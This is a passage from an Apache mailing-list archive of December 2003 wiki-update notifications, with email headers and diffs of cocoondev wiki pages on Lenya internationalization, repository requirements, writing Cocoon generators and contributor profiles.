shouldn't be a problem since I assume a website provides links to swtich the documents language. See the [Debian|http://www.debian.org/] website for a real straightforward pattern of serving multilingual documents. Changing the browser's language settings while watching the debian website causes every page to be displayed in the newly set language as long as you do not specify a language identifier in the url. At the bottom of the page, the user can access the language of the document being viewe! d via hyperlinks. This pattern can also be used, if webpages are not served by Lenya but i.e. by [Apache Http Server|http://httpd.apache.org/] using [mod_negotiation|http://httpd.apache.org/docs/content-negotiation.html]. Using this pattern fits imho best for the many cases where the user is able and aware of setting his browser's accept-language. The pattern also suits well enough for the other cases, but the user than has to switch the language on each page he visits, if the user agent doesn't send the user's preferred accept-language. To implement this pattern as shown on the debian website would mean to change the current behavior of Lenya, that if you request i.e. tutorial_de.html all links in the returned page point to _de versions if available. The advantage of this behavior is, that a user has to switch the language only once via a hyperlink, because the user is directed to i.e. tutorial.de.html which contains links to other .de pages if available. Should mean, the u! ser is able to override his user agent's accept-language manually via hyperlinks. Imho, this is a quite cool extension for the debian pattern of serving multilingual documents, but leads into a maintenance problem, since all .de.html documents which reference documents without language indentifier need to be changed, if a referenced document gets available in .de. I propose to implement the debian pattern of serving multilingual documents as is. ? ! ! - + * __The initial document language served should be derived from a user agent's accept-language header if available.__ Should mean, the accept-language overrides the default publication language if the requested document is available in the accept-language.This would enhance useability. Of course it costs some effort and the automatic part of negotiation does not work in offline browsing mode. In case of offline browsing(pages are not served via a http server) changing the language shouldn't be a problem since I assume a website provides links to swtich the documents language. See the [Debian|http://www.debian.org/] website for a real straightforward pattern of serving multilingual documents. Changing the browser's language settings while watching the debian website causes every page to be displayed in the newly set language as long as you do not specify a language identifier in the url. At the bottom of the page, the user can access the language of the document being viewe! d via hyperlinks. This pattern can also be used, if webpages are not served by Lenya but i.e. by [Apache Http Server|http://httpd.apache.org/] using [mod_negotiation|http://httpd.apache.org/docs/content-negotiation.html]. Using this pattern fits imho best for the many cases where the user is able and aware of setting his browser's accept-language. The pattern also suits well enough for the other cases, but the user than has to switch the language on each page he visits, if the user agent doesn't send the user's preferred accept-language. To implement this pattern as shown on the debian website would mean to change the current behavior of Lenya, that if you request i.e. tutorial_de.html all links in the returned page point to _de versions if available. The advantage of this behavior is, that a user has to switch the language only once via a hyperlink, because the user is directed to i.e. tutorial.de.html which contains links to other .de pages if available. Should mean, the u! ser is able to override his user agent's accept-language manually via hyperlinks. Imho, this is a quite cool extension for the debian pattern of serving multilingual documents, but leads into a maintenance problem, since all .de.html documents which reference documents without language identifier need to be changed, if a referenced document gets available in .de. I propose to implement the debian pattern of serving multilingual documents as is. From [email protected] Sat Dec 27 21:00:11 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 1683 invoked from network); 27 Dec 2003 21:00:10 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 27 Dec 2003 21:00:10 -0000 Received: (qmail 20508 invoked by uid 500); 27 Dec 2003 20:59:59 -0000 Delivered-To: [email protected] Received: (qmail 20451 invoked by uid 500); 27 Dec 2003 20:59:59 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 20439 invoked from network); 27 Dec 2003 20:59:58 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 27 Dec 2003 20:59:58 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBRL03O20741 for <[email protected]>; Sat, 27 Dec 2003 22:00:03 +0100 Date: Sat, 27 Dec 2003 22:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] LenyaI18N Sat Dec 27 22:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=LenyaI18N , version: 105 on Sat Dec 27 21:09:31 2003 by RolfKulemann - __Documents can be authored and served in multiple languages.__ Each language version is stored in a separate file fitting a file name pattern which currently is myfilename_locale.xml i.e. tutorial_de.xml or tutorial_en.xml. The ''language negotiation protocol'' is simply defined within the request url. Should mean, a Lenya class i.e. the DefaultDocumentBuilder searches for a language identifier like _en or _de in the request uri. Based on that information the appropiate language version of the requested document is served. If you request i.e. tutorial_de.html all links in that page point to _de.html versions assuming that a german version of the destination exists. Request to uris without a language identifier are routed to a document version in the publication's default language. + __Documents can be authored and served in multiple languages.__ Each language version is stored in a separate file fitting a file name pattern which currently is myfilename_locale.xml i.e. tutorial_de.xml or tutorial_en.xml. The ''language negotiation protocol'' is simply defined within the request url. Should mean, a Lenya class i.e. the DefaultDocumentBuilder searches for a language identifier like _en or _de in the request uri. Based on that information the appropiate language version of the requested document is served. If you request i.e. tutorial_de.html all links in that page point to _de.html versions assuming that a german version of the destination exists. Request to uris without a language identifier are ''always'' being routed to a document version in the publication's default language. ? +++++++++++++++++ From [email protected] Sat Dec 27 22:00:15 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 12032 invoked from network); 27 Dec 2003 22:00:15 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 27 Dec 2003 22:00:15 -0000 Received: (qmail 45911 invoked by uid 500); 27 Dec 2003 21:59:58 -0000 Delivered-To: [email protected] Received: (qmail 45880 invoked by uid 500); 27 Dec 2003 21:59:58 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 45817 invoked from network); 27 Dec 2003 21:59:57 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 27 Dec 2003 21:59:57 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBRM02O20768 for <[email protected]>; Sat, 27 Dec 2003 23:00:03 +0100 Date: Sat, 27 Dec 2003 23:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] LenyaI18N Sat Dec 27 23:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=LenyaI18N , version: 105 on Sat Dec 27 21:09:31 2003 by RolfKulemann - __Documents can be authored and served in multiple languages.__ Each language version is stored in a separate file fitting a file name pattern which currently is myfilename_locale.xml i.e. tutorial_de.xml or tutorial_en.xml. The ''language negotiation protocol'' is simply defined within the request url. Should mean, a Lenya class i.e. the DefaultDocumentBuilder searches for a language identifier like _en or _de in the request uri. Based on that information the appropiate language version of the requested document is served. If you request i.e. tutorial_de.html all links in that page point to _de.html versions assuming that a german version of the destination exists. Request to uris without a language identifier are routed to a document version in the publication's default language. + __Documents can be authored and served in multiple languages.__ Each language version is stored in a separate file fitting a file name pattern which currently is myfilename_locale.xml i.e. tutorial_de.xml or tutorial_en.xml. The ''language negotiation protocol'' is simply defined within the request url. Should mean, a Lenya class i.e. the DefaultDocumentBuilder searches for a language identifier like _en or _de in the request uri. Based on that information the appropiate language version of the requested document is served. If you request i.e. tutorial_de.html all links in that page point to _de.html versions assuming that a german version of the destination exists. Request to uris without a language identifier are ''always'' being routed to a document version in the publication's default language. ? +++++++++++++++++ From [email protected] Sun Dec 28 11:00:18 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 52762 invoked from network); 28 Dec 2003 11:00:17 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 28 Dec 2003 11:00:17 -0000 Received: (qmail 74306 invoked by uid 500); 28 Dec 2003 10:59:50 -0000 Delivered-To: [email protected] Received: (qmail 74276 invoked by uid 500); 28 Dec 2003 10:59:50 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 74265 invoked from network); 28 Dec 2003 10:59:49 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 28 Dec 2003 10:59:49 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBSB02O28154 for <[email protected]>; Sun, 28 Dec 2003 12:00:03 +0100 Date: Sun, 28 Dec 2003 12:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] LenyaI18N Sun Dec 28 12:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=LenyaI18N , version: 112 on Sun Dec 28 10:43:58 2003 by RolfKulemann - The first setting is useful, if a user wants to use a user agent to define his preferred language for web pages. The second setting is to define the language of system messages, which are not directly requested by a user agent i.e. emails send to the user by Lenya. + The first setting is useful, if a user wants to use a user agent i.e. a browser to define his preferred language for web pages. The second setting is to define the language of system messages, which are not directly requested by a user agent i.e. workflow notification emails send to the user by Lenya. ? +++++++++++++++ ++++++++++++++++++++++ From [email protected] Sun Dec 28 13:00:09 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 72126 invoked from network); 28 Dec 2003 13:00:09 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 28 Dec 2003 13:00:09 -0000 Received: (qmail 19431 invoked by uid 500); 28 Dec 2003 13:00:06 -0000 Delivered-To: [email protected] Received: (qmail 19296 invoked by uid 500); 28 Dec 2003 13:00:06 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 19283 invoked from network); 28 Dec 2003 13:00:05 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 28 Dec 2003 13:00:05 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBSD05O28204 for <[email protected]>; Sun, 28 Dec 2003 14:00:05 +0100 Date: Sun, 28 Dec 2003 14:00:05 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] RolfKulemann People LenyaI18N Sun Dec 28 14:00:05 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=RolfKulemann , version: 3 on Sun Dec 28 13:05:33 2003 by RolfKulemann - My main interest at this site is to contribute to [Apache Lenya|http://cocoon.apache.org/lenya/]. My main interests in Lenya developemnt is document editing and editor integration, site management, content repository integration and i18n. ? ^^^^^^^^^^^ - - + My focus at this site is to contribute to [Apache Lenya|http://cocoon.apache.org/lenya/]. My main interests in Lenya development is document editing and editor integration, site management, content repository integration and i18n. ? ^^^^ + + * "verba volant, scripta manent (discussions get forgotten, just code remains)" -- I saw it first on NicolaKen's email footer Page: http://wiki.cocoondev.org/Wiki.jsp?page=People , version: 231 on Sun Dec 28 13:12:25 2003 by RolfKulemann - * [RolfKulemann] -- Open Source Content Management activist, consultant and developer, Hannover ? ^ ^ ^^ ^ + * [RolfKulemann] -- Open Source Content Management activist, consultant and developer. Lenya committer. ? ^ ^^^^ ^^ ^^^^^ + Page: http://wiki.cocoondev.org/Wiki.jsp?page=LenyaI18N , version: 127 on Sun Dec 28 12:48:34 2003 by RolfKulemann - ''This wiki was created by [RolfKulemann] in december 2003. Please post comments to this wiki to [Lenya-Dev|http://news.gmane.org/gmane.comp.cms.lenya.devel].'' ? ------------- + ''This wiki was created by [RolfKulemann] in december 2003. Please post comments to [Lenya-Dev|http://news.gmane.org/gmane.comp.cms.lenya.devel].'' From [email protected] Sun Dec 28 14:00:10 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 82519 invoked from network); 28 Dec 2003 14:00:10 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 28 Dec 2003 14:00:10 -0000 Received: (qmail 41506 invoked by uid 500); 28 Dec 2003 14:00:06 -0000 Delivered-To: [email protected] Received: (qmail 41475 invoked by uid 500); 28 Dec 2003 14:00:06 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 41464 invoked from network); 28 Dec 2003 14:00:06 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 28 Dec 2003 14:00:06 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBSE06O28231 for <[email protected]>; Sun, 28 Dec 2003 15:00:06 +0100 Date: Sun, 28 Dec 2003 15:00:06 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] People LenyaI18N LenyaRepositoryRequirements RolfKulemann Sun Dec 28 15:00:06 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=People , version: 233 on Sun Dec 28 13:16:29 2003 by RolfKulemann - * [RolfKulemann] -- Open Source Content Management activist, consultant and developer. [Apache Lenya|http://cocoon.apache.org/lenya/] committer. + * [Rolf Kulemann|RolfKulemann] -- Open Source Content Management activist, consultant and developer. [Apache Lenya|http://cocoon.apache.org/lenya/] committer. ? ++++++++++++++ Page: http://wiki.cocoondev.org/Wiki.jsp?page=LenyaI18N , version: 128 on Sun Dec 28 13:19:26 2003 by RolfKulemann - ''This wiki summarizes discussions about internationalization(i18n) in [Lenya|http://cocoon.apache.org/lenya/]. + ''This wiki summarizes discussions about internationalization(i18n) in [Apache Lenya|http://cocoon.apache.org/lenya/]. ? +++++++ Page: http://wiki.cocoondev.org/Wiki.jsp?page=LenyaRepositoryRequirements , version: 20 on Sun Dec 28 13:51:56 2003 by RolfKulemann - * [content management system for apache projects, codenamed "Doco"|http://wiki.cocoondev.org/Wiki.jsp?page=Doco] ? ---------------------------------------- + * [content management system for apache projects, codenamed "Doco"|Doco] Page: http://wiki.cocoondev.org/Wiki.jsp?page=RolfKulemann , version: 13 on Sun Dec 28 13:38:18 2003 by RolfKulemann - The reason why I'm active in the [Cocoon|http://cocoon.apache.org/] and Lenya community is simply that I needed a ''rock solid web development and content management framework''. I believe Apache Cocoon and Lenya catalyzed by the other projects in the Apache software stack will satisfy my desires. Of course there are a lot of open source content managemnt system out there, but a mandatory requirement for me is to use as many [W3C|http://w3c.org/] standards like [XML|http://www.w3.org/XML/] and [XSL|http://www.w3.org/Style/XSL/] as possible. I must not say that Cocoon and Lenya are ''well formed'' in many cases :) + The reason why I'm active in the [Cocoon|http://cocoon.apache.org/] and Lenya community is simply that I needed a ''rock solid web development and content management framework''. I believe Apache Cocoon and Lenya catalyzed by the other projects in the [Apache|http://www.apache.org/] software stack will satisfy my desires. Of course there are a lot of open source content managemnt system out there, but a mandatory requirement for me is to use as many [W3C|http://w3c.org/] standards like [XML|http://www.w3.org/XML/] and [XSL|http://www.w3.org/Style/XSL/] as possible. I must not say that Cocoon and Lenya are ''well formed'' in many cases :) ? + ++++++++++++++++++++++++ From [email protected] Sun Dec 28 17:00:09 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 35715 invoked from network); 28 Dec 2003 17:00:08 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 28 Dec 2003 17:00:08 -0000 Received: (qmail 80244 invoked by uid 500); 28 Dec 2003 17:00:02 -0000 Delivered-To: [email protected] Received: (qmail 80098 invoked by uid 500); 28 Dec 2003 17:00:01 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 80076 invoked from network); 28 Dec 2003 17:00:01 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 28 Dec 2003 17:00:01 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBSH03O28308 for <[email protected]>; Sun, 28 Dec 2003 18:00:03 +0100 Date: Sun, 28 Dec 2003 18:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] LenyaRepositoryRequirements Sun Dec 28 18:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=LenyaRepositoryRequirements , version: 23 on Sun Dec 28 17:10:40 2003 by RolfKulemann - # Moving of assets in the repository (without breaking contracts). The moving of assets can be implemented via metadata see 1.5.). See discussion here:\\ [http://article.gmane.org/gmane.comp.cms.lenya.devel/2005]\\ This requirement serves as basis to implement staging of assets. ? ^^ + # Moving of assets in the repository (without breaking contracts). The moving of assets could be implemented via metadata see 1.5.). See discussion here:\\ [http://article.gmane.org/gmane.comp.cms.lenya.devel/2005]\\ This requirement serves as basis to implement staging of assets. ? ^^^^ - + # If access control is a concern of the Repository I propose it to be reflected in the rep. API, because otherwise Lenya has to deal with it. ''This is an important decision''. + # Simple transactions - # Simple transaction features.Make sense when saving doc collections. Is an image a doc? I propose to use the term asset for all type of objects in the repository. Transactions seem to be useful for workflow if workflow is reflected/implemented via metadata of an asset. See discussion here:\\[http://article.gmane.org/gmane.comp.cms.lenya.devel/2005] - # If access control is a concern of the Repository I propose it to be reflected in the rep. API, because otherwise Lenya has to deal with it. This is an important decision. From [email protected] Sun Dec 28 18:00:09 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 49190 invoked from network); 28 Dec 2003 18:00:09 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 28 Dec 2003 18:00:09 -0000 Received: (qmail 12504 invoked by uid 500); 28 Dec 2003 18:00:00 -0000 Delivered-To: [email protected] Received: (qmail 12480 invoked by uid 500); 28 Dec 2003 18:00:00 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 12419 invoked from network); 28 Dec 2003 17:59:59 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 28 Dec 2003 17:59:59 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBSI02O28341 for <[email protected]>; Sun, 28 Dec 2003 19:00:02 +0100 Date: Sun, 28 Dec 2003 19:00:02 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] LenyaRepositoryRequirements Sun Dec 28 19:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=LenyaRepositoryRequirements , version: 23 on Sun Dec 28 17:10:40 2003 by RolfKulemann - # Moving of assets in the repository (without breaking contracts). The moving of assets can be implemented via metadata see 1.5.). See discussion here:\\ [http://article.gmane.org/gmane.comp.cms.lenya.devel/2005]\\ This requirement serves as basis to implement staging of assets. ? ^^ + # Moving of assets in the repository (without breaking contracts). The moving of assets could be implemented via metadata see 1.5.). See discussion here:\\ [http://article.gmane.org/gmane.comp.cms.lenya.devel/2005]\\ This requirement serves as basis to implement staging of assets. ? ^^^^ - + # If access control is a concern of the Repository I propose it to be reflected in the rep. API, because otherwise Lenya has to deal with it. ''This is an important decision''. + # Simple transactions - # Simple transaction features.Make sense when saving doc collections. Is an image a doc? I propose to use the term asset for all type of objects in the repository. Transactions seem to be useful for workflow if workflow is reflected/implemented via metadata of an asset. See discussion here:\\[http://article.gmane.org/gmane.comp.cms.lenya.devel/2005] - # If access control is a concern of the Repository I propose it to be reflected in the rep. API, because otherwise Lenya has to deal with it. This is an important decision. From [email protected] Mon Dec 29 00:00:13 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 51687 invoked from network); 29 Dec 2003 00:00:13 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 29 Dec 2003 00:00:13 -0000 Received: (qmail 5441 invoked by uid 500); 28 Dec 2003 23:59:58 -0000 Delivered-To: [email protected] Received: (qmail 5407 invoked by uid 500); 28 Dec 2003 23:59:58 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 5394 invoked from network); 28 Dec 2003 23:59:57 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 28 Dec 2003 23:59:57 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBT004O28504 for <[email protected]>; Mon, 29 Dec 2003 01:00:04 +0100 Date: Mon, 29 Dec 2003 01:00:04 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] GETlenya Mon Dec 29 01:00:04 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=GETlenya , version: 63 on Sun Dec 28 23:58:40 2003 by 161.129.204.104 - {{{You should create two directories within the directory where tomcat reside + {{{You should create two directories within the directory where tomcat resides ? + - King regards\\ ? ^ + Kind regards\\ ? ^ From [email protected] Mon Dec 29 16:00:10 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 65986 invoked from network); 29 Dec 2003 16:00:10 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 29 Dec 2003 16:00:10 -0000 Received: (qmail 46441 invoked by uid 500); 29 Dec 2003 16:00:04 -0000 Delivered-To: [email protected] Received: (qmail 46415 invoked by uid 500); 29 Dec 2003 16:00:04 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 46401 invoked from network); 29 Dec 2003 16:00:03 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 29 Dec 2003 16:00:03 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBTG05O29243 for <[email protected]>; Mon, 29 Dec 2003 17:00:05 +0100 Date: Mon, 29 Dec 2003 17:00:05 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] LenyaRepositoryRequirements WritingGenerators Lenya LenyaNewPublicationHowTo Mon Dec 29 17:00:05 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=LenyaRepositoryRequirements , version: 25 on Mon Dec 29 15:19:36 2003 by RolfKulemann + * ["Converging the repository concept" - Thread in Cocoon-Dev|http://marc.theaimsgroup.com/?t=107022316500003&r=1&w=2] - * ["Converging the repository concept" - Thread in Cocoon-Dev|http://marc.theaimsgroup.com/?t=107022316500003&r=1&w=2] Page: http://wiki.cocoondev.org/Wiki.jsp?page=WritingGenerators , version: 11 on Mon Dec 29 15:53:51 2003 by 161.129.204.104 - actual i am looking for. + write a class whitch extends from AbstractGenerator. + in the method generate() use the xmlConsumer so generate SAX-Events. Page: http://wiki.cocoondev.org/Wiki.jsp?page=Lenya , version: 48 on Mon Dec 29 15:30:47 2003 by RolfKulemann + * [LenyaI18N] + * [LenyaNewPublicationHowTo] - * [LenyaI18N] + Page: http://wiki.cocoondev.org/Wiki.jsp?page=LenyaNewPublicationHowTo , version: 2 on Mon Dec 29 15:35:48 2003 by RolfKulemann - This how to briefly describes how to setup a new publication. Since tehre is no clickn klack function to create new publications i.e. with a wizard, instructions given here will focus on editing xml, xslt and xmap files. ? ^ ^^ - + This HowTo briefly describes how to setup a new publication. Since there is no clickn klack function to create new publications i.e. with a wizard, the instructions given here will focus on editing xml, xslt and xmap files. ? ^ ^ + ++++ From [email protected] Mon Dec 29 19:00:10 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 28965 invoked from network); 29 Dec 2003 19:00:10 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 29 Dec 2003 19:00:10 -0000 Received: (qmail 43408 invoked by uid 500); 29 Dec 2003 19:00:02 -0000 Delivered-To: [email protected] Received: (qmail 43207 invoked by uid 500); 29 Dec 2003 19:00:00 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 43170 invoked from network); 29 Dec 2003 19:00:00 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 29 Dec 2003 19:00:00 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBTJ03O29316 for <[email protected]>; Mon, 29 Dec 2003 20:00:03 +0100 Date: Mon, 29 Dec 2003 20:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] WritingGenerators Mon Dec 29 20:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=WritingGenerators , version: 12 on Mon Dec 29 18:13:44 2003 by 161.129.204.104 + *http://cocoon.apache.org/2.1/tutorial/tutorial-generator.html From [email protected] Tue Dec 30 08:00:18 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 77349 invoked from network); 30 Dec 2003 08:00:18 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 30 Dec 2003 08:00:18 -0000 Received: (qmail 2346 invoked by uid 500); 30 Dec 2003 07:59:55 -0000 Delivered-To: [email protected] Received: (qmail 2209 invoked by uid 500); 30 Dec 2003 07:59:54 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 2198 invoked from network); 30 Dec 2003 07:59:53 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 30 Dec 2003 07:59:53 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBU805O29994 for <[email protected]>; Tue, 30 Dec 2003 09:00:05 +0100 Date: Tue, 30 Dec 2003 09:00:05 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] WyonaOpenOffice WritingGenerators Tue Dec 30 09:00:05 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=WyonaOpenOffice , version: 4 on Tue Dec 30 07:48:22 2003 by 161.129.204.104 Page: http://wiki.cocoondev.org/Wiki.jsp?page=WritingGenerators , version: 13 on Tue Dec 30 07:34:51 2003 by 161.129.204.104 - !Generator Java source Stump ? ------ + !Generator Java source - write a class whitch extends from AbstractGenerator. ? ^ ^ + Write a Class whitch extends from AbstractGenerator. ? ^ ^ - in the method generate() use the xmlConsumer so generate SAX-Events. ? ^ ^ --- + In the method generate() use the xmlConsumer (this.xmlConsumer) to create SAX-Events. ? ^ ++++ +++++++++++++++ ^^ From [email protected] Tue Dec 30 09:00:18 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 3868 invoked from network); 30 Dec 2003 09:00:17 -0000 Received: from 